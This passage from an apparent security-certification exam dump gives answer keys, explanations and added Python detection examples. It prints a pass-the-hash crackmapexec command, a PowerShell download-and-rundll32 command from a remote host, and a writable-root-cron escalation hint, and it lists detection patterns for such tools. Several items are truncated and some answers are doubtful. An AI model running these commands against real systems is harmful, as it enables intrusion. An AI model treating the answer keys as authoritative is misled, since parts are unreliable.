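        if result == "FAIL":
            failures[src].append((ts, user))

    verdicts = {}
    for src, fails in failures.items():
        fails.sort()
        verdict = "normal"
        for i, (start, _) in enumerate(fails):
            # Sliding window: every failure from this source within `window` of `start`.
            users = Counter(u for ts, u in fails[i:] if ts - start <= window)
            if len(users) >= min_users and max(users.values()) <= max_per_user:
                verdict = "spraying"
                break
            if len(users) == 1 and sum(users.values()) >= min_attempts:
                verdict = "brute-force"
                break
        verdicts[src] = verdict
    return verdicts


if __name__ == "__main__":
    for src, verdict in sorted(classify_sources(parse_log(SAMPLE_LOG)).items()):
        print(f"{src:15} {verdict}")
```

In a SIEM the same logic is usually expressed as a correlation rule keyed on source IP with a distinct-count of usernames; the sliding window matters because a patient attacker spreads attempts over hours to stay under per-user lockout thresholds.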
QUESTION 867
An employee received multiple messages on a mobile device. The messages instruct the
employee to pair the device with an unknown device. Which of the following BEST describes what
a malicious person might be doing to cause this issue to occur?
A. Jamming
B. Bluesnarfing
C. Evil twin
D. Rogue access point
Answer: B
QUESTION 868
A network engineer and a security engineer are discussing ways to monitor network operations.
Which of the following is the BEST method?
A. Disable Telnet and force SSH.
B. Establish a continuous ping.
C. Utilize an agentless monitor.
D. Enable SNMPv3 with passwords.
Answer: D
QUESTION 869
Which of the following authentication methods is considered to be the LEAST secure?
A. TOTP
B. SMS
C. HOTP
D. Token key
Answer: B
QUESTION 870
Which of the following incident response steps occurs before containment?
A. Eradication
B. Recovery
C. Lessons learned
D. Identification
Answer: D
QUESTION 871
Which of the following BEST describes data streams that are compiled through artificial
intelligence that provides insight on current cyber intrusions, phishing, and other malicious cyber
activity?
A. Intelligence fusion
B. Review reports
C. Log reviews
D. Threat feeds
Answer: D
Explanation:
Threat feeds are information sources that provide real-time or near real-time data on security
threats, such as indicators of compromise, phishing domains, and malware hashes. These feeds
come from commercial vendors, open source projects, and government agencies, and they are
typically consumed by a SIEM or other tooling so that organizations can detect and respond to
threats more quickly and effectively.
QUESTION 872
Which of the following technologies is used to actively monitor for specific file types being
transmitted on the network?
A. File integrity monitoring
B. Honeynets
C. Tcpreplay
D. Data loss prevention
Answer: D
QUESTION 873
As part of the building process for a web application, the compliance team requires that all PKI
certificates are rotated annually and can only contain wildcards at the secondary subdomain
level. Which of the following certificate properties will meet these requirements?
A. https://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
B. https://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
C. https://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
D. https://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023
Answer: C
Explanation:
Reading *.app1.comptia.org from right to left:
comptia.org - registered domain
app1 - first-level subdomain
* - secondary subdomain level (matches names such as www.app1.comptia.org)
Options A and D place the wildcard directly under the domain, and D is valid for two years rather
than one.
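To make the two compliance rules mechanical, here is an added Python example (not from the original page) that checks each option's hostname and validity period: a wildcard must be a single leading label at least two levels below the registered domain, and the validity period must not exceed a year (366 days is an assumption to tolerate leap years). Run against the four options it passes B and C; B passes only because it contains no wildcard at all, and C is the option that exercises the wildcard rule.

```python
from datetime import datetime, timedelta

MAX_VALIDITY = timedelta(days=366)   # annual rotation, leap-year tolerant (assumption)
MIN_WILDCARD_LABELS = 4              # "*.app1.comptia.org" -> ["*", "app1", "comptia", "org"]
DATE_FMT = "%B %d %H:%M:%S %Y"       # matches "April 10 00:00:00 2021" as written in the options


def wildcard_ok(name):
    """True if the name has no wildcard, or a single leading '*' at the secondary subdomain level."""
    labels = name.lower().split(".")
    if "*" not in name:
        return True
    if labels[0] != "*" or any("*" in label for label in labels[1:]):
        return False          # only a whole leading label may be a wildcard
    return len(labels) >= MIN_WILDCARD_LABELS


def validity_ok(not_before, not_after):
    """Certificate lifetime must be positive and no longer than MAX_VALIDITY."""
    return not_before < not_after and (not_after - not_before) <= MAX_VALIDITY


def check_certificate(url, valid_from, valid_to):
    """Apply both policy rules to one option; returns (wildcard_ok, validity_ok)."""
    host = url.split("://", 1)[-1].split("/", 1)[0]
    not_before = datetime.strptime(valid_from, DATE_FMT)
    not_after = datetime.strptime(valid_to, DATE_FMT)
    return wildcard_ok(host), validity_ok(not_before, not_after)


# The four options from the question, as (label, URL, not-before, not-after).
OPTIONS = [
    ("A", "https://*.comptia.org",      "April 10 00:00:00 2021", "April 8 12:00:00 2022"),
    ("B", "https://app1.comptia.org",   "April 10 00:00:00 2021", "April 8 12:00:00 2022"),
    ("C", "https://*.app1.comptia.org", "April 10 00:00:00 2021", "April 8 12:00:00 2022"),
    ("D", "https://*.comptia.org",      "April 10 00:00:00 2021", "April 8 12:00:00 2023"),
]


def compliant_options():
    """Labels of the options that satisfy both rules."""
    return [label for label, url, nb, na in OPTIONS if all(check_certificate(url, nb, na))]


if __name__ == "__main__":
    for label, url, nb, na in OPTIONS:
        print(label, url, check_certificate(url, nb, na))
    print("compliant:", compliant_options())
```

In a real pipeline the hostname and dates would come from the parsed certificate (subject alternative names, notBefore and notAfter) rather than from strings, but the policy checks are the same.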
QUESTION 874
A security administrator wants to implement a program that tests a user's ability to recognize
attacks over the organization's email system.
Which of the following would be BEST suited for this task?
A. Social media analysis
B. Annual information security training
C. Gamification
D. Phishing campaign
Answer: D
Explanation:
A phishing campaign is best suited for testing a user's ability to recognize attacks over the
organization's email system. Phishing is a social engineering technique used by attackers to trick
users into divulging sensitive information, such as login credentials or personal information. By
launching a simulated phishing campaign, a security administrator can test whether employees
are able to identify and avoid phishing attempts. This can help to raise awareness about the
dangers of phishing and improve the overall security posture of the organization.
QUESTION 875
A third party asked a user to share a public key for secure communication. Which of the following
file formats should the user choose to share the key?
A. .pfx
B. .csr
C. .pvk
D. .cer
Answer: D
Explanation:
A public key is typically shared in the form of a certificate, a digital document that contains the
public key and identity information about its owner. The .cer file format holds an X.509 certificate
(DER or Base64-encoded) and no private key, so it is safe to send to a third party. A .pfx
(PKCS#12) bundle and a .pvk file contain the private key and must never be shared, and a .csr is
only a request for a certificate, not an issued key.
QUESTION 876
A security analyst needs an overview of vulnerabilities for a host on the network.
Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable
services are running?
A. Non-credentialed
B. Web application
C. Privileged
D. Internal
Answer: D
QUESTION 877
Which of the following identifies the point in time when an organization will recover data in the
event of an outage?
A. ALE
B. RPO
C. MTBF
D. ARO
Answer: B
QUESTION 878
Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?
A. Hashing
B. DNS sinkhole
C. TLS inspection
D. Data masking
Answer: C
QUESTION 879
Which of the following BEST describes a technique that compensates researchers for finding
vulnerabilities?
A. Penetration testing
B. Code review
C. Wardriving
D. Bug bounty
Answer: D
QUESTION 880
A security architect is implementing a new email architecture for a company. Due to security
concerns, the Chief Information Security Officer would like the new architecture to support email
encryption, as well as provide for digital signatures. Which of the following should the architect
implement?
A. TOP
B. IMAP
C. https
D. S/MIME
Answer: D
QUESTION 881
Which of the following controls would provide the BEST protection against tailgating?
A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage
Answer: A
Explanation:
An access control vestibule (mantrap) is two interlocked doors that admit one person at a time, so
a second person cannot follow an authorized user through. CCTV only records a tailgater after the
fact, and a proximity card reader can be defeated by holding the door for the person behind; most
access controls can be overcome by social engineering.
QUESTION 882
A security engineer is reviewing the logs from a SAML application that is configured to use MFA.
During this review the engineer notices a high volume of successful logins that did not require
MFA from users who were traveling internationally. The application, which can be accessed
without a VPN, has a policy that allows time-based tokens to be generated. Users who changed
locations should be required to reauthenticate but have been
Which of the following statements BEST explains the issue?
A. OpenID is mandatory to make the MFA requirements work
B. An incorrect browser has been detected by the SAML application
C. The access device has a trusted certificate installed that is overwriting the session token
D. The user's IP address is changing between logins, but the application is not invalidating the
token
Answer: D
QUESTION 883
The help desk has received calls from users in multiple locations who are unable to access core
network services. The network team has identified and turned off the network switches using
remote commands. Which of the following actions should the network team take NEXT?
A. Disconnect all external network connections from the firewall
B. Send response teams to the network switch locations to perform updates
C. Turn on all the network switches by using the centralized management software
D. Initiate the organization's incident response plan.
Answer: D
Explanation:
In the given scenario, since multiple locations are affected, and the network team has identified
and turned off the network switches, it suggests a widespread network issue that could have
been caused by an attack or a major network fault. Therefore, the next action the network team
should take is to initiate the organization's incident response plan. This plan will help them identify
the cause of the problem and respond appropriately to minimize the impact and restore normal
operations as quickly as possible.
QUESTION 884
A security researcher is using an adversary's infrastructure and HTTPs and creating a named
group to track those targeted.
Which of the following is the researcher MOST likely using?
A. The Cyber Kill Chain
B. The incident response process
C. The Diamond Model of Intrusion Analysis
D. MITRE ATT&CK
Answer: C
Explanation:
The Diamond Model of Intrusion Analysis describes every intrusion event in terms of four vertices:
adversary, infrastructure, capability, and victim. Tracking the adversary's infrastructure and
grouping the targeted victims under a name is analysis along those vertices, whereas the Cyber
Kill Chain and MITRE ATT&CK describe the phases and techniques of an attack.
QUESTION 885
The compliance team requires an annual recertification of privileged and non-privileged user
access. However, multiple users who left the company six months ago still have access. Which of
the following would have prevented this compliance violation?
A. Account audits
B. AUP
C. Password reuse
D. SSO
Answer: A
Explanation:
Account audits are periodic reviews of user accounts to ensure that they are being used
appropriately and that access is granted and revoked in accordance with the organization's
policies and procedures. Regular audits would have identified the users who left the company six
months ago, and their access would have been revoked well before the annual recertification.
Audits also surface inactive and unused accounts, so that only authorized users retain access to
the company's systems and data.
QUESTION 886
Which of the following roles would MOST likely have direct access to the senior management
team?
A. Data custodian
B. Data owner
C. Data protection officer
D. Data controller
Answer: C
Explanation:
The Data Protection Officer (DPO) is responsible for overseeing an organization's data protection
strategy and implementation to ensure compliance with applicable laws and regulations. The
DPO acts as an independent advisor to the senior management team and has direct access to
them. The DPO also serves as a liaison between the organization and regulatory authorities on
matters related to data protection. Therefore, the DPO is most likely to have direct access to the
senior management team.
QUESTION 887
During a forensic investigation, a security analyst discovered that the following command was run
on a compromised host:
crackmapexec smb 192.168.10.232 -u localadmin -H 0A3CE8D07A46E5C51070F03593E0A5E6
Which of the following attacks occurred?
A. Buffer overflow
B. Pass the hash
C. SQL injection
D. Replay attack
Answer: B
Explanation:
crackmapexec smb is a tool that authenticates to, and runs commands against, SMB (Server
Message Block) services on Windows hosts. The -u flag specifies the user account and the -H flag
supplies an NT (NTLM) password hash in place of a password. Here the attacker authenticated to
192.168.10.232 as localadmin using only the stolen hash, without knowing the cleartext password.
This technique is called pass the hash; it works because NTLM authentication proves possession
of the hash rather than the password, and it is commonly used to move laterally between hosts
that share the same local administrator credential.
QUESTION 888
A user attempts to load a web-based application, but the expected login screen does not appear.
A help desk analyst troubleshoots the issue by running the following command and reviewing the
output on the user's PC:
user> nslookup software-solution.com
Server: rogue.comptia.com
Address: 172.16.1.250
Non-authoritative answer:
Name: software-solution.com
Address: 10.20.10.10
The help desk analyst then runs the same command on the local PC:
helpdesk> nslookup software-solution.com
Server: dns.comptia.com
Address: 172.16.1.1
Non-authoritative answer:
Name: software-solution.com
Address: 172.16.1.10
Which of the following BEST describes the attack that is being detected?
A. Domain hijacking
B. DNS poisoning
C. MAC flooding
D. Evil twin
Answer: B
Explanation:
The user's PC is sending its queries to rogue.comptia.com (172.16.1.250) instead of the corporate
resolver dns.comptia.com (172.16.1.1), and that server answers 10.20.10.10 for
software-solution.com rather than the legitimate 172.16.1.10. The user is receiving a poisoned
DNS answer that redirects the login page to another host. Domain hijacking would change the
registration of the domain itself, which would affect the help desk's lookup as well.
QUESTION 889
Hotspot Question
You received the output of a recent vulnerability assessment.
Review the assessment and scan output and determine the appropriate remediation(s) for each
device.
Remediation options may be selected multiple times, and some devices may require more than
one remediation.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
QUESTION 890
A business is looking for a cloud service provider that offers a la carte services, including cloud
backups, VM elasticity, and secure networking. Which of the following cloud service provider
types should the business engage?
A. IaaS
B. PaaS
C. XaaS
D. SaaS
Answer: C
Explanation:
"A la carte" service means you can get any service you want from what the provider offers.
QUESTION 891
A security analyst notices that specific files are being deleted each time a systems administrator
is on vacation. Which of the following BEST describes the type of malware that is running?
A. Fileless virus
B. Logic bomb
C. Keylogger
D. Ransomware
Answer: B
QUESTION 892
Which of the following can reduce vulnerabilities by avoiding code reuse?
A. Memory management
B. Stored procedures
C. Normalization
D. Code obfuscation
Answer: D
Explanation:
Code obfuscation transforms source or compiled code so that it is difficult to read and reverse
engineer. Because obfuscated code cannot easily be lifted and reused in other programs, a flaw in
it is less likely to propagate into other code bases. Obfuscation does not remove vulnerabilities
from the original program and is not a substitute for secure coding.
QUESTION 893
A security administrator needs to block a TCP connection using the corporate firewall. Because
this connection is potentially a threat, the administrator does not want to send back an RST.
Which of the following actions in the firewall rule would work BEST?
A. Drop
B. Reject
C. Log alert
D. Permit
Answer: A
Explanation:
With the Drop action the firewall silently discards the packet and sends nothing back, so the
sender sees only a timeout. With the Reject action the firewall sends a TCP RST (or an ICMP
unreachable message for other protocols) telling the source that the connection was refused,
which also confirms to an attacker that a filtering device is present.
QUESTION 894
A security team discovered a large number of company-issued devices with non-work-related
software installed. Which of the following policies would MOST likely contain language that would
prohibit this activity?
A. NDA
B. BPA
C. AUP
D. SLA
Answer: C
Explanation:
An acceptable use policy (AUP) is a document stipulating constraints and practices that a user
must agree to for access to a corporate network, the internet or other resources.
QUESTION 895
A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk
computer's operating system has been hardened and tested. A security engineer is concerned
that someone could use removable media to install a rootkit. Which of the following should the
security engineer configure to BEST protect the kiosk computer?
A. Measured boot
B. Boot attestation
C. UEFI
D. EDR
Answer: A
Explanation:
Measured Boot (introduced with Windows 8 on UEFI firmware) records a hash of each start-up
component, from the firmware through the boot loader and boot drivers, in the Trusted Platform
Module (TPM). Because the measurements are kept in the TPM rather than on the disk, a rootkit
introduced from removable media changes the measured values and the tampering can be
detected before the operating system is trusted.
QUESTION 896
An organization wants to enable built-in FDE on all laptops. Which of the following should the
organization ensure is installed on all laptops?
A. TPM
B. CA
C. SAML
D. CRL
Answer: A
Explanation:
The organization should ensure that a Trusted Platform Module (TPM) is installed on all laptops
in order to enable built-in Full Disk Encryption (FDE) such as BitLocker. The TPM is a hardware
security chip that stores the disk encryption key and releases it only when the boot measurements
match, which protects the data if the drive is removed from the laptop. The TPM must be enabled
in firmware and provisioned before FDE can use it.
QUESTION 897
A security analyst needs to centrally manage credentials and permissions to the company's
network devices. The following security requirements must be met:
- All actions performed by the network staff must be logged.
- Per-command permissions must be possible.
- The authentication server and the devices must communicate through
TCP.
Which of the following authentication protocols should the analyst choose?
A. Kerberos
B. CHAP
C. TACACS+
D. RADIUS
Answer: C
Explanation:
TACACS+ (Terminal Access Controller Access Control System Plus) meets all three requirements:
it runs over TCP (port 49), it separates authentication, authorization, and accounting so that
authorization can be evaluated per command, and its accounting records log every command the
network staff run. RADIUS uses UDP, combines authentication and authorization, and encrypts
only the password field, so it cannot provide per-command authorization.
QUESTION 898
An organization recently released a software assurance policy that requires developers to run
code scans each night on the repository. After the first night, the security team alerted the
developers that more than 2,000 findings were reported and need to be addressed. Which of the
following is the MOST likely cause for the high number of findings?
A. The vulnerability scanner was not properly configured and generated a high number of false positives.
B. Third-party libraries have been loaded into the repository and should be removed from the codebase.
C. The vulnerability scanner found several memory leaks during runtime, causing duplicate reports for the same issue.
D. The vulnerability scanner was not loaded with the correct benchmarks and needs to be updated.
Answer: A
QUESTION 899
A major manufacturing company updated its internal infrastructure and just recently started to
allow OAuth applications to access corporate data. Data leakage is now being reported. Which of
the following MOST likely caused the issue?
A. Privilege creep
B. Unmodified default settings
C. TLS protocol vulnerabilities
D. Improper patch management
Answer: B
QUESTION 900
An organization is moving away from the use of client-side and server-side certificates for EAP.
The company would like for the new EAP solution to have the ability to detect rogue access
points. Which of the following would accomplish these requirements?
A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS
Answer: B
Explanation:
EAP-FAST authenticates by means of a PAC (Protected Access Credential), a shared secret that
the authentication server issues and can manage dynamically, so neither side needs an X.509
certificate.
EAP-TLS requires both client and server certificates, while EAP-TTLS and PEAP still rely on a
server certificate. The question states the company is moving away from client-side and
server-side certificates.
QUESTION 901
A security team is engaging a third-party vendor to do a penetration test of a new proprietary
application prior to its release. Which of the following documents would the third-party vendor
MOST likely be required to review and sign?
A. SLA
B. NDA
C. MOU
D. AUP
Answer: B
Explanation:
The third-party vendor would most likely be required to review and sign a non-disclosure
agreement (NDA) or confidentiality agreement. This document outlines the terms and conditions
of the engagement, including the requirement for the vendor to keep all information about the
proprietary application confidential and not to disclose any information about the test results or
findings to any third parties.
QUESTION 902
During a Chief Information Security Officer (CISO) convention to discuss security awareness, the
attendees are provided with a network connection to use as a resource. As the convention
progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site
requests are reverting to HTTP. Which of the following BEST describes what is happening?
A. Birthday collision on the certificate key
B. DNS hijacking to reroute traffic
C. Brute force to the access point
D. An SSL/TLS downgrade
Answer: D
QUESTION 903
Audit logs indicate an administrative account that belongs to a security engineer has been locked
out multiple times during the day. The security engineer has been on vacation for a few days.
Which of the following attacks can the account lockout be attributed to?
A. Backdoor
B. Brute-force
C. Rootkit
D. Trojan
Answer: B
QUESTION 904
After installing a patch on a security appliance, an organization realized a massive data
exfiltration had occurred. Which of the following BEST describes the incident?
A. Supply chain attack
B. Ransomware attack
C. Cryptographic attack
D. Password attack
Answer: A
QUESTION 905
Physical access to the organization's servers in the data center requires entry and exit through
multiple access points: a lobby, an access control vestibule, three doors leading to the server
floor, a door to the server floor itself, and eventually to a caged area solely for the organization's
hardware. Which of the following controls is described in this scenario?
A. Compensating
B. Deterrent
C. Preventive
D. Detective
Answer: C
QUESTION 906
A company is switching to a remote work model for all employees. All company and employee
resources will be in the cloud. Employees must use their personal computers to access the cloud
computing environment. The company will manage the operating system. Which of the following
deployment models is the company implementing?
A. CYOD
B. MDM
C. COPE
D. VDI
Answer: D
QUESTION 907
A security administrator needs to inspect in-transit files on the enterprise network to search for
PII, credit card data, and classification words. Which of the following would be the BEST to use?
A. IDS solution
B. EDR solution
C. HIPS software solution
D. Network DLP solution
Answer: D
QUESTION 908
The Chief Executive Officer announced a new partnership with a strategic vendor and asked the
Chief Information Security Officer to federate user digital identities using SAML-based protocols.
Which of the following will this enable?
A. SSO
B. MFA
C. PKI
D. DLP
Answer: A
Explanation:
The implementation of SAML-based protocols will enable Single Sign-On (SSO).
QUESTION 909
An employee's company account was used in a data breach. Interviews with the employee
revealed:
- The employee was able to avoid changing passwords by using a previous
password again.
- The account was accessed from a hostile, foreign nation, but the
employee has never traveled to any other countries.
Which of the following can be implemented to prevent these issues from reoccurring? (Choose
two.)
A. Geographic dispersal
B. Password complexity
C. Password history
D. Geotagging
E. Password lockout
F. Geofencing
Answer: CF
Explanation:
C - The user bypassed the password change by reusing a previously used password; password
history prevents reuse.
F - The user has never travelled to another country, so geofencing will limit logins to the expected
location.
QUESTION 910
A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The
malicious website looks exactly like the legitimate website. Which of the following BEST
describes this type of attack?
A. Reconnaissance
B. Impersonation
C. Typosquatting
D. Watering-hole
Answer: C
Explanation:
Typosquatting is a type of cyber attack where an attacker creates a domain name that is similar
to a legitimate domain name, but with a slight variation, such as a misspelling, in order to trick
users into visiting the malicious site. In this case, the malicious site "comptiia.org" is designed to
look like the legitimate site "comptia.org", in an attempt to steal sensitive information or perform
other malicious activities.
QUESTION 911
The marketing department at a retail company wants to publish an internal website to the internet
so it is reachable by a limited number of specific, external service providers in a secure manner.
Which of the following configurations would be BEST to fulfil this requirement?
A. NAC
B. ACL
C. WAF
D. NAT
Answer: A
Explanation:
Network access for non-employees (vendors or partners): NAC with VPN allows external users to
access the corporate network (or specific parts of it) through a secure self-service portal.
QUESTION 912
A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and
operated by an outdated and unsupported specialized Windows OS. Which of the following is
MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?
A. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
B. The MRI vendor does not support newer versions of the OS.
C. Changing the OS breaches a support SLA with the MRI vendor.
D. The IT team does not have the budget required to upgrade the MRI scanner.
Answer: B
Explanation:
It's a specialized version of the OS, so the vendor dropped the support.
QUESTION 913
A company received a "right to be forgotten" request. To legally comply, the company must
remove data related to the requester from its systems. Which of the following is the company
MOST likely complying with?
A. NIST CSF
B. GDPR
C. PCI DSS
D. ISO 27001
Answer: B
Explanation:
The General Data Protection Regulation (GDPR) governs how personal data must be collected,
processed, and erased. The "right to be forgotten," which received a lot of press after the 2014
judgment from the EU Court of Justice, set the precedent for the right of erasure provision
contained in the GDPR.
QUESTION 914
A security administrator is evaluating remote access solutions for employees who are
geographically dispersed. Which of the following would provide the MOST secure remote
access? (Choose two.)
A. IPSec
B. SFTP
C. SRTP
D. LDAPS
E. S/MIME
F. SSL VPN
Answer: AF
QUESTION 915
A company is looking to migrate some servers to the cloud to minimize its technology footprint.
The company has a customer relationship management system on premises. Which of the
following solutions will require the LEAST infrastructure and application support from the
company?
A. SaaS
B. IaaS
C. PaaS
D. SDN
Answer: A
QUESTION 916
A network administrator needs to determine the sequence of a server farm's logs. Which of the
following should the administrator consider? (Choose two.)
A. Chain of custody
B. Tags
C. Reports
D. Time stamps
E. Hash values
F. Time offset
Answer: DF
Explanation:
Time stamps establish when each entry was written, and the time offset (time zone differences
and clock skew between servers) must be applied to them before entries from different servers
can be placed in a single, correct sequence.
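As an added illustration (not from the original question), the Python below normalises timestamps written with different UTC offsets and subtracts a known clock skew before sorting. The hosts, messages and the ten-second skew on db01 are constructed for the example; the point is that sorting the wall-clock text puts db01's entry first, converting to UTC fixes the zone problem, and applying the skew restores the real sequence.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample log entries (not from the question): each server writes local time with
# its own UTC offset. db01's clock is also assumed to run 10 seconds fast.
SAMPLE = [
    ("db01",  "2024-03-01T03:00:13-05:00", "query executed"),    # 08:00:13Z as recorded
    ("app01", "2024-03-01T08:00:02+00:00", "forwarding to db"),  # 08:00:02Z
    ("web01", "2024-03-01T09:00:05+01:00", "response sent"),     # 08:00:05Z
    ("web01", "2024-03-01T09:00:01+01:00", "request received"),  # 08:00:01Z
]


def to_utc(stamp, skew_seconds=0):
    """Apply the zone offset to get UTC, then remove how far the host's clock runs fast."""
    return datetime.fromisoformat(stamp).astimezone(timezone.utc) - timedelta(seconds=skew_seconds)


def order_events(entries, skew_by_host=None):
    """Sort (host, stamp, message) entries into true order.

    skew_by_host maps a host name to the number of seconds its clock runs ahead of
    the reference clock, as measured during evidence collection.
    """
    skew_by_host = skew_by_host or {}
    return sorted(entries, key=lambda e: to_utc(e[1], skew_by_host.get(e[0], 0)))


def naive_order(entries):
    """What you get by sorting the wall-clock text and ignoring the offset entirely."""
    return sorted(entries, key=lambda e: e[1][:19])


def sequence(entries, skew_by_host=None):
    """Just the messages, in the order order_events() produces."""
    return [e[2] for e in order_events(entries, skew_by_host)]


if __name__ == "__main__":
    print("naive:       ", [e[2] for e in naive_order(SAMPLE)])
    print("utc:         ", sequence(SAMPLE))
    print("utc + skew:  ", sequence(SAMPLE, {"db01": 10}))
```

During an investigation the skew values come from comparing each server's clock against a trusted reference at collection time and should be recorded alongside the evidence, since they change the story the timeline tells.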
QUESTION 917
A security administrator, who is working for a government organization, would like to utilize
classification and granular planning to secure top secret data and grant access on a need-to-know
basis. Which of the following access control schemes should the administrator consider?
A. Mandatory
B. Rule-based
C. Discretionary
D. Role-based
Answer: A
Explanation:
In a MAC system, an operating system provides individual users with access based on data
confidentiality and levels of user clearance.
MAC is the strictest of all models. Access is granted on a strict, need-to-know basis. Users must
prove they need the requested information or access before gaining permission.
QUESTION 918
An organization is outlining data stewardship roles and responsibilities. Which of the following
employee roles would determine the purpose of data and how to process it?
A. Data custodian
B. Data controller
C. Data protection officer
D. Data processor
Answer: B
Explanation:
A data controller is the entity that determines the purposes for processing personal information
and directs how that data is processed. The term comes from European law (GDPR) and is used
in place of data owner to avoid presuming that anyone who collects data has an ownership interest
in it; a data processor, by contrast, acts only on the controller's instructions.
QUESTION 919
Multiple beaconing activities to a malicious domain have been observed. The malicious domain is
hosting malware from various endpoints on the network. Which of the following technologies
would be BEST to correlate the activities between the different endpoints?
A. Firewall
B. SIEM
C. IPS
D. Protocol analyzer
Answer: B
QUESTION 920
Users report access to an application from an internal workstation is still unavailable to a specific
server, even after a recent firewall rule implementation that was requested for this access. ICMP
traffic is successful between the two devices. Which of the following tools should the security
analyst use to help identify if the traffic is being blocked?
A. nmap
B. tracert
C. ping
D. ssh
Answer: A
Explanation:
Nmap reports whether the application's port on the server is open, closed, or filtered; a filtered
result while ICMP succeeds shows that a firewall is still blocking the TCP port even though the host
itself is reachable.
QUESTION 921
As part of annual audit requirements, the security team performed a review of exceptions to the
company policy that allows specific users the ability to use USB storage devices on their laptops.
The review yielded the following results:
- The exception process and policy have been correctly followed by the
majority of users.
- A small number of users did not create tickets for the requests but
were granted access.
- All access had been approved by supervisors.
- Valid requests for the access sporadically occurred across multiple
departments.
- Access, in most cases, had not been removed when it was no longer
needed.
Which of the following should the company do to ensure that appropriate access is not disrupted
but unneeded access is removed in a reasonable time frame?
A. Create an automated, monthly attestation process that removes access if an employee's supervisor denies the app
B. Remove access for all employees and only allow new access to be granted if the employee's supervisor approves
C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the ma
D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use
Answer: C
QUESTION 922
A cryptomining company recently deployed a new antivirus application to all of its mining
systems. The installation of the antivirus application was tested on many personal devices, and
no issues were observed. Once the antivirus application was rolled out to the servers, constant
issues were reported. As a result, the company decided to remove the mining software. The
antivirus application was MOST likely classifying the software as:
A. a rootkit.
B. a PUP.
C. a backdoor.
D. ransomware.
E. a RAT.
Answer: B
Explanation:
The mining software was MOST likely being classified by the antivirus application as a Potentially
Unwanted Program (PUP).
QUESTION 923
A company recently implemented a patch management policy; however, vulnerability scanners
have still been flagging several hosts, even after the completion of the patch process. Which of
the following is the MOST likely cause of the issue?
A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
D. Code development is being outsourced.
Answer: C
Explanation:
A vulnerability scanner reports known, published vulnerabilities, so it is very unlikely to be
flagging zero-days: by definition nobody has a signature for a flaw that is not yet known.
Patch management programs routinely cover the operating system while missing third-party
applications (browsers, runtimes, office suites), which stay unpatched and keep being flagged
after the OS patch cycle completes.
QUESTION 924
A penetration tester executes the command crontab -l while working in a Linux server
environment. The penetration tester observes the following string in the current user's list of cron
jobs:
*/10 * * * * root /writable/update.sh
Which of the following actions should the penetration tester perform NEXT?
A. Privilege escalation
B. Memory leak
C. Directory traversal
D. Race condition
Answer: A
Explanation:
The cron job runs /writable/update.sh every 10 minutes as root, and the script lives in a
directory whose name suggests unprivileged users can write to it. If the current user can modify
update.sh, or replace it because the parent directory is writable, anything placed in the script
will execute as root within 10 minutes. The next step is therefore to check those permissions
(ls -ld /writable; ls -l /writable/update.sh) and, if they are writable, use the job to escalate
privileges. (A user field only exists in system crontabs such as /etc/crontab and /etc/cron.d;
the exam treats this entry as a root-privileged job.)
QUESTION 925
An employee received an email with an unusual file attachment named Updates.lnk. A security
analyst is reverse engineering what the file does and finds that it executes the following script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI
https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process
rundll32.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?
A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.
Answer: A
Explanation:
The script downloads a file from a remote server using PowerShell and saves it as
autoupdate.dll in the user's temporary folder; the .jpg extension on the URL is a disguise,
because the response body is written straight to disk as a DLL. It then loads that DLL with
rundll32.exe, a signed Windows binary, so the malicious code runs inside a trusted process.
This download-and-load pattern is what the exam classes as DLL injection. Useful indicators:
PowerShell writing a file under %TEMP% from a URL, and rundll32.exe launched with a DLL path
inside a user profile.
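Detection logic for the pattern just described, as an added example that is not part of the exam dump. It scores process-creation command lines against four indicators (remote download, write to a user temp location, execution through a signed Windows binary, and an image URL saved with an executable extension). The sample command lines are constructed; the first is modelled on the one in the question, the other two are benign administrative activity.

```python
"""Triage command lines for PowerShell download-and-load behaviour.

Added example, not from the exam dump. SAMPLE_COMMANDS are constructed; the
first mirrors the command in the question."""
import re

INDICATORS = {
    # Remote content fetched from a URL
    "remote download": re.compile(
        r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|DownloadFile|DownloadString|"
        r"Net\.WebClient|-Uri\b|-OutFile\b)", re.I),
    # Payload written to a user-writable temp location
    "writes to user temp": re.compile(r"(\$env:TEMP|%TEMP%|\\AppData\\Local\\Temp\\)", re.I),
    # Execution proxied through a signed Windows binary (LOLBin)
    "executes via LOLBin": re.compile(
        r"\b(rundll32|regsvr32|mshta|wscript|cscript|msiexec)(\.exe)?\b", re.I),
    # Fetched as an image/document but saved with an executable extension
    "image URL saved as executable": re.compile(
        r"https?://\S+\.(jpe?g|png|gif|txt|pdf)\b.*\.(dll|exe|ps1|bat|scr)\b", re.I | re.S),
}

SAMPLE_COMMANDS = [
    # Constructed, modelled on the command in the question
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg "
    r"-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll",
    # Benign scheduled maintenance
    r"powershell.exe -File C:\Scripts\rotate-logs.ps1",
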